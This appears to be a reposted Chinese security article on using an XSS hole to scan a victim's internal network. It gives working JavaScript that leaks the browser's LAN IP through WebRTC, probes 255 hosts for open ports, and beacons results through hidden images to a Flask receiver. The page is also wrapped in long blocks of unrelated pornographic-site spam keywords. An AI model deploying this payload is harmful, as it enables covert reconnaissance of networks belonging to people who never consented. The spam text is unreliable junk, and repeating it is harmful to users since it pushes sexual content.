精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

XSS的另一種利用思路

作者:佚名
安全 漏洞
安全測試人員在測試XSS漏洞的時候,用得最多的方式是利用XSS釣魚攻擊、盜取會話憑證,挾持會話。當然還有很多其他利用方式,但是卻很少涉及內(nèi)網(wǎng)滲透環(huán)節(jié)。本文通過實踐介紹利用js進行內(nèi)網(wǎng)端口掃描的滲透思路。

前言

安全測試人員在測試XSS漏洞的時候,用得最多的方式是利用XSS釣魚攻擊、盜取會話憑證,挾持會話。當然還有很多其他利用方式,但是卻很少涉及內(nèi)網(wǎng)滲透環(huán)節(jié)。換一種思路,XSS還可以做很多意想不到的事,本文通過實踐介紹利用js進行內(nèi)網(wǎng)端口掃描的滲透思路。

[[226309]]

獲取局域網(wǎng)IP

進行內(nèi)網(wǎng)端口掃描首先第一點要獲取內(nèi)網(wǎng)IP,這是最關(guān)鍵的一步,這里有一個前輩的Demo:

使用的WebRTC技術(shù)獲取當前訪問者的局域網(wǎng)IP,具體的js實現(xiàn)如下:

  1. function getlanip(callback){ 
  2.     var ip_dups = {}; 
  3.     var RTCPeerConnection = window.RTCPeerConnection 
  4.         || window.mozRTCPeerConnection 
  5.         || window.webkitRTCPeerConnection; 
  6.     if (!RTCPeerConnection) { 
  7.         var iframe = document.createElement('iframe'); 
  8.         iframe.sandbox = 'allow-same-origin'
  9.         iframe.style.display = 'none'
  10.         document.body.appendChild(iframe); 
  11.         var win = iframe.contentWindow; 
  12.         winwindow.RTCPeerConnection = win.RTCPeerConnection; 
  13.         winwindow.mozRTCPeerConnection = win.mozRTCPeerConnection; 
  14.         winwindow.webkitRTCPeerConnection = win.webkitRTCPeerConnection; 
  15.         RTCPeerConnection = window.RTCPeerConnection 
  16.             || window.mozRTCPeerConnection 
  17.             || window.webkitRTCPeerConnection; 
  18.     } 
  19.     var mediaConstraints = { 
  20.         optional: [{RtpDataChannels: true}] 
  21.     }; 
  22.     var servers = undefined
  23.     if(window.webkitRTCPeerConnection) 
  24.         servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]}; 
  25.     var pc = new RTCPeerConnection(servers, mediaConstraints); 
  26.     pc.onicecandidate = function(ice){ 
  27.         if(ice.candidate){ 
  28.             var ip_regex = /([0-9]{1,3}(.[0-9]{1,3}){3})/ 
  29.             var ip_addr = ip_regex.exec(ice.candidate.candidate)[1]; 
  30.  
  31.             if(ip_dups[ip_addr] === undefined) 
  32.                 callback(ip_addr); 
  33.  
  34.             ip_dups[ip_addr] = true;} 
  35.         }; 
  36.     pc.createDataChannel(""); 
  37.     pc.createOffer(function(result){ 
  38.         pc.setLocalDescription(result, function(){}, function(){}); 
  39.         }, function(){}); 
  40.     } 

WebRTC

WebRTC,是網(wǎng)頁實時通信(Web Real-Time Communication)的縮寫,是一個支持網(wǎng)頁瀏覽器進行實時語音對話或視頻對話的技術(shù)。WebRTC 實現(xiàn)了基于網(wǎng)頁的視頻會議,標準是 WHATWG 協(xié)議,目的是通過瀏覽器提供簡單的 Javascript 就可以做到實時通訊。WebRTC 項目的最終目的主要是讓 Web 開發(fā)者能夠基于瀏覽器輕易快捷地開發(fā)出豐富的實時多媒體應(yīng)用,而無需下載安裝任何插件,Web 開發(fā)者也無需關(guān)注多媒體的數(shù)字信號處理過程,只需編寫簡單的 Javascript 程序即可實現(xiàn),很多瀏覽器包括Firefox Chrome,360極速瀏覽器都已經(jīng)支持WebRTC, 但是Internet Explorer 和 Safari 尚未支持 WebRTC。

JS端口掃描

有了局域網(wǎng)IP,利用sciprt標簽加載js函數(shù)執(zhí)行,然后利用html onload事件結(jié)合img標簽當然可以這里可以使用其他的比如:iframe標簽等,把加載成功的IP,端口信息傳回我們的接收端,這里我用Flask簡單的寫了一個接收端。

  1. #!/usr/bin/env python3 
  2. #coding:utf-8 
  3.  
  4. from flask import Flask,request 
  5.  
  6. app = Flask(__name__) 
  7.  
  8. @app.route(rule='/'
  9. def index(): 
  10.     args = request.args 
  11.     for k,v in args.items(): 
  12.         print(k,v) 
  13.     return str() 
  14.  
  15. if __name__ == '__main__': 
  16.     app.run(debug=True

下面是一個簡單的掃描函數(shù)和數(shù)據(jù)傳回函數(shù)。

  1. //數(shù)據(jù)傳回 
  2. var TagName = document.getElementsByTagName("body")[0]; 
  3. function post_data(ip,port){ 
  4.     var img = document.createElement("img"); 
  5.     img.setAttribute("src","http://127.0.0.1:5000/?ip=" + ip + "&openport=" + port); 
  6.     img.setAttribute("style","display:none") 
  7.     TagName.appendChild(img); 
  8.     } 
  9.  
  10. //簡單端口掃描 
  11. getlanip(function(ip){ 
  12. //判斷內(nèi)網(wǎng)IP 
  13.     if (ip.match(/^(192.168.|169.254.|10.|172.(1[6-9]|2d|3[01]))/)){ 
  14.         ipip = ip.split("."); 
  15.         ip.pop(); 
  16.         ipip = ip.join("."); 
  17.         for(var i = 1;i<=255;i++){ 
  18.             var script = document.createElement("script"); 
  19.             var ipip_url = ip + "." + i + ":80";//3306 
  20.             script.setAttribute("src","http://" + ip_url); 
  21.             script.setAttribute("onload","post_data('" + ip + "." + i + "','80')");//3306 
  22.             TagName.appendChild(script); 
  23.         } 
  24.     } 
  25.     }); 

隨便一個html引入js文件,加載效果圖。

在服務(wù)端成功的接收到了開放80端口的ip。

當然其他端口也是可以的只要支持http協(xié)議訪問的比如3306。

探測到開放3306端口的主機,這樣實現(xiàn)了一個簡單的局域網(wǎng)ip端口的功能。

結(jié)語

當懷疑某處存在xss漏洞而我們又想知道內(nèi)網(wǎng)具體的ip端口情況時,我們就可以利用這種方式實現(xiàn)局域網(wǎng)端口探測,有點類似于SSRF,但是通過XSS也同樣可以實現(xiàn)。

責任編輯:趙寧寧 來源: 安全客
XSS攻擊漏洞
相關(guān)推薦

2014-09-17 14:37:06

2013-05-22 15:31:07

AOP的CGlib實現(xiàn)

2017-09-19 14:21:37

AI

2016-03-03 10:29:31

用戶信息改進

2010-07-21 16:23:09

運行telnet程序

2011-12-29 21:28:31

Metro UI

2023-06-18 23:19:17

ChatGPTPPT方式

2016-07-11 16:18:26

互聯(lián)網(wǎng)

2014-01-13 10:36:53

C++錯誤

2019-01-02 08:04:29

GAN損失函數(shù)神經(jīng)網(wǎng)絡(luò)

2010-04-09 17:27:47

2011-07-21 14:17:15

Ceylon

2013-09-30 10:13:08

IT女程序員

2013-10-21 15:11:15

OrmsqlOrm設(shè)計

2009-06-17 12:01:21

Linux

2015-07-28 13:36:04

2010-09-02 09:14:35

CSS浮動

2009-06-17 09:05:05

Linux隱藏網(wǎng)絡(luò)鏈接命令

2019-03-17 15:59:05

Android PAPIAPP

2013-09-12 14:26:47

百度云網(wǎng)盤
點贊
收藏

51CTO技術(shù)棧公眾號

中文字幕人妻互换av久久| 国产精品无码永久免费不卡| 麻豆av在线免费看| 国产99久久久国产精品免费看| 午夜精品久久久久久久白皮肤| 国产免费看av| 精品一区二区三区四区五区| 婷婷国产在线综合| 在线一区日本视频| 亚洲欧美激情另类| 日韩福利电影在线观看| 欧美精品在线观看| 懂色av蜜桃av| 女仆av观看一区| 884aa四虎影成人精品一区| 精品久久一二三| 日本最新在线视频| 91麻豆国产香蕉久久精品| 国产日韩精品电影| 国产精品人人人人| 午夜久久久久| 色偷偷av一区二区三区乱| 少妇性l交大片7724com| 电影一区二区| 欧美日韩一区二区三区| 毛片在线视频观看| 无遮挡动作视频在线观看免费入口| 粉嫩嫩av羞羞动漫久久久| 国产精品一区二区三区久久久 | 中文字幕乱妇无码av在线| 日韩在线短视频| 精品久久久久久久久久国产| 亚洲天堂第一区| 福利成人在线观看| 97精品久久久久中文字幕| 99九九电视剧免费观看| 国产又粗又黄又爽| 青青草国产精品97视觉盛宴| 欧美在线播放视频| 欧美一级视频免费观看| 极品中文字幕一区| 欧美高清在线视频观看不卡| 欧美激情精品久久久久久免费| 凹凸成人精品亚洲精品密奴| 亚洲精品一区中文| 人妻丰满熟妇av无码久久洗澡| 亚洲日本va中文字幕| 欧美一区二区三区视频免费| 久久久精品高清| 欧洲精品久久久久毛片完整版| 欧美主播一区二区三区| 日韩一级片播放| 成人开心激情| 在线中文字幕一区二区| 成年人免费大片| 精品视频在线一区二区在线| 欧美最猛黑人xxxxx猛交| 日韩免费高清在线| 日韩国产网站| 欧美熟乱第一页| 国产日韩欧美久久| 国产亚洲欧美日韩精品一区二区三区 | 日日骚一区二区网站| h视频在线观看免费| 中文一区一区三区高中清不卡| 视频一区视频二区视频三区视频四区国产 | 亚洲欧美制服另类日韩| 无码熟妇人妻av| 国产最新精品| 久久久国产精品一区| 欧美三级日本三级| 99精品久久| 国产精品福利片| 国产伦子伦对白视频| 国产91精品精华液一区二区三区 | 欧美女子与性| 日本一区二区在线不卡| 一级黄色录像免费看| 午夜伦理在线视频| 福利一区福利二区微拍刺激| 日本888xxxx| 精品国产伦一区二区三区观看说明| 日韩欧美在线一区二区三区| 欧美成人三级伦在线观看| 久久爱www成人| 久久这里有精品视频| 国产稀缺真实呦乱在线| 日韩成人一级片| 99精品欧美一区二区三区| 日本精品专区| 亚洲色大成网站www久久九九| 国内精品在线观看视频| 99久久久国产精品免费调教网站| 91精品国产麻豆| 国产精品三级在线观看无码| 小处雏高清一区二区三区| 97视频在线观看网址| 亚洲一级av毛片| gogo大胆日本视频一区| 亚洲一区二三| 一区二区精品伦理...| 51精品国自产在线| 亚洲精品视频久久久| 国产一区欧美| 成人av.网址在线网站| 深夜福利在线视频| 一区二区三区四区蜜桃| 999在线免费视频| 久久草在线视频| 久热精品视频在线观看一区| www欧美在线| 国产成人精品一区二| 日韩福利视频| 国产美女精品写真福利视频| 91精品国产品国语在线不卡| 国产18无套直看片| 国产精品一卡| 国产精品久久7| av在线影院| 欧美日韩精品三区| 日韩人妻一区二区三区 | 午夜dv内射一区二区| 91亚洲无吗| 最近2019中文字幕在线高清| 久久国产视频一区| 成人午夜在线免费| 国产女人18毛片| 亚洲人成777| 曰本色欧美视频在线| 欧美精品二区三区| gogo大胆日本视频一区| 欧美一级免费播放| 99国产精品免费网站| 欧美片一区二区三区| 国产伦精品一区二区三区四区 | 国产情侣免费视频| 久久久久久久久伊人| 久久久久久久午夜| 97久久亚洲| 欧美国产中文字幕| 亚洲黄色小说网| 亚洲一区二区四区蜜桃| 亚洲少妇一区二区| 欧美日韩亚洲一区| 国产精品我不卡| av中文在线资源| 精品久久国产字幕高潮| 九九免费精品视频| 懂色av一区二区在线播放| 日韩精品一区二区在线视频| 2023国产精华国产精品| 欧美极品少妇xxxxⅹ喷水 | 国产精品亚洲成在人线| 中文字幕日韩综合av| 亚洲视频在线免费播放| 国产精品国产a| 久久精品亚洲天堂| 一区二区中文| 好吊色欧美一区二区三区四区 | 伊人情人综合网| 91传媒视频免费| 久久不射影院| 国产丝袜精品视频| 国产精品自拍第一页| 亚洲国产高清aⅴ视频| 不卡中文字幕在线观看| 永久91嫩草亚洲精品人人| av噜噜色噜噜久久| 中文不卡1区2区3区| 原创国产精品91| 国产熟女一区二区丰满| 亚洲国产成人91porn| 波多野结衣办公室33分钟| 人人狠狠综合久久亚洲| 国产精品无码乱伦| 国产另类在线| 国产精品第100页| 黄色片网站在线| 亚洲国产成人爱av在线播放| 黄色片网站在线免费观看| 国产精品午夜电影| 年下总裁被打光屁股sp| 久久99伊人| 艳母动漫在线免费观看| 亚洲aa在线| 91青草视频久久| 理论不卡电影大全神| 中文字幕亚洲欧美日韩高清| 精品国精品国产自在久不卡| 欧美日韩中文字幕日韩欧美| fc2ppv在线播放| 99久久国产免费看| 三级性生活视频| 国产深夜精品| 中文字幕精品在线播放| 综合国产视频| av激情久久| 九七影院97影院理论片久久| 九九精品在线观看| 亚洲欧美视频一区二区| 亚洲精品国产精品乱码不99按摩| 这里只有精品9| 色悠悠久久综合| 国产一级理论片| 国产精品另类一区| 国产色视频一区二区三区qq号| 国产精品一区一区| 午夜两性免费视频| 中文精品视频| 日韩一级特黄毛片| 日韩在线观看电影完整版高清免费悬疑悬疑| 成人黄动漫网站免费| 日本久久二区| 国产精品视频999| 中文av在线全新| 海角国产乱辈乱精品视频| 麻豆传媒在线观看| 一区二区成人精品| 日韩有码电影| 亚洲精品xxx| 国产成人自拍一区| 日韩欧美区一区二| 99产精品成人啪免费网站| 欧美色图第一页| 中文精品久久久久人妻不卡| 欧美性猛交xxxx乱大交蜜桃| 日本网站免费观看| 亚洲高清三级视频| 黄色一级免费视频| 亚洲精品视频免费看| 国精产品久拍自产在线网站| 日本一区二区三级电影在线观看 | 中文字幕永久有效| 奇米888四色在线精品| 国产一区视频免费观看| 久久99伊人| 老司机午夜av| 日韩福利视频网| 日本特黄a级片| 久久久久国产一区二区| 男人透女人免费视频| 亚洲欧美清纯在线制服| 日韩av黄色网址| 久久精品人人| 一级黄色香蕉视频| 免费视频最近日韩| jizz大全欧美jizzcom| 美女网站一区二区| 中文字幕久久av| 国产一区日韩二区欧美三区| 樱花草www在线| 国产高清精品网站| 精品一区二区三区四区五区六区| 成人免费毛片片v| 无码一区二区精品| 久久久久免费观看| 欧美a在线播放| 亚洲蜜臀av乱码久久精品蜜桃| 欧美卡一卡二卡三| 亚洲成人综合视频| 久草手机在线观看| 色狠狠综合天天综合综合| 国产又粗又猛又黄视频| 欧美日韩国产高清一区二区| 国产99对白在线播放| 亚洲国产高清高潮精品美女| 久久手机免费观看| 日韩三级成人av网| 国产网红女主播精品视频| 2019av中文字幕| 成人av色网站| 成人午夜电影免费在线观看| 亚洲欧美tv| 在线码字幕一区| 一本色道久久综合亚洲精品不| 亚洲免费av一区二区三区| 国模大尺度一区二区三区| 波多野结衣加勒比| 中文字幕欧美三区| 久久久久亚洲av成人片| 一本一本大道香蕉久在线精品| 亚洲网站免费观看| 亚洲国产精品va在看黑人| 国产在线一二三| 久久99精品国产99久久6尤物| 日本不卡1234视频| 91久久精品在线| 网红女主播少妇精品视频| 一区二区三区我不卡| 影音先锋久久资源网| 亚洲国产高清av| 播五月开心婷婷综合| 99国产精品无码| 精品女同一区二区三区在线播放| 亚洲综合精品在线| 亚洲成人久久电影| 午夜伦理在线| 欧洲成人免费aa| 午夜视频一区二区在线观看| 日韩av大全| 亚洲看片一区| 中文字幕第66页| 国产日韩高清在线| 国产一卡二卡在线| 欧美一区二区高清| 成人18在线| 538国产精品一区二区在线 | 欧亚在线中文字幕免费| 96国产粉嫩美女| 欧美先锋资源| aa在线免费观看| 成人免费观看男女羞羞视频| 777777国产7777777| 欧美最猛黑人xxxxx猛交| 视频一区二区三区在线看免费看| 欧美大片在线影院| 99亚洲男女激情在线观看| 色吧亚洲视频| 日韩制服丝袜av| 97香蕉碰碰人妻国产欧美 | 欧美黄色一级大片| 亚洲国产精品99久久| 啦啦啦中文在线观看日本| 91精品视频在线免费观看| 日韩免费特黄一二三区| 日本在线视频www| 91免费在线播放| 亚洲一区欧美在线| 亚洲国产精品va| 超碰99在线| 国产精品免费区二区三区观看| 99精品美女| 五月天开心婷婷| 中文字幕一区二区三区在线观看 | 日韩五码电影| 一区二区欧美日韩| 捆绑调教一区二区三区| 极品久久久久久久| 欧美亚一区二区| 在线看免费av| 成人激情视频在线播放| 天天操综合网| 欧美熟妇另类久久久久久多毛| 亚洲欧美另类小说| 亚洲国产成人一区二区| 欧美激情视频网址| 久久久伦理片| 少妇av一区二区三区无码| 91女人视频在线观看| 日本中文字幕久久| 在线观看亚洲视频| 免费成人高清在线视频| 欧美一级免费在线观看| 国产精品系列在线播放| 国产一级一片免费播放放a| 亚洲国产精品va在线| 成人性教育av免费网址| 日本一区二区三区精品视频| 免费成人你懂的| 日韩在线观看视频一区二区| 日韩美女一区二区三区| 国产黄大片在线观看| 欧美一区二区三区在线播放 | 国产欧美日韩精品在线观看| 999国产精品永久免费视频app| xxx中文字幕| 午夜精彩视频在线观看不卡| 你懂的视频在线| 国产美女91呻吟求| 欧美日韩亚洲一区三区| 精品人妻一区二区三区日产乱码卜| 欧美亚洲丝袜传媒另类| www在线视频| 国产在线一区二区三区播放| 丝袜脚交一区二区| 日韩欧美综合视频| 日韩大陆毛片av| 国产成人免费| 91亚洲精品国产| 国产精品网站导航| 成人毛片在线免费观看| 国产99视频精品免视看7| 久久久久久久久久久久久久久久久久| 亚洲成人福利视频| 色婷婷综合五月| 18视频在线观看网站| 久久久久综合一区二区三区| 九一久久久久久| 在线能看的av| 久久久国产精彩视频美女艺术照福利| 国内毛片久久| 污视频网址在线观看| 黄色成人av网| 二区在线播放| 日本一区视频在线播放| 粉嫩欧美一区二区三区高清影视| 久草视频在线免费| 8090成年在线看片午夜| 68国产成人综合久久精品| 9.1成人看片免费版|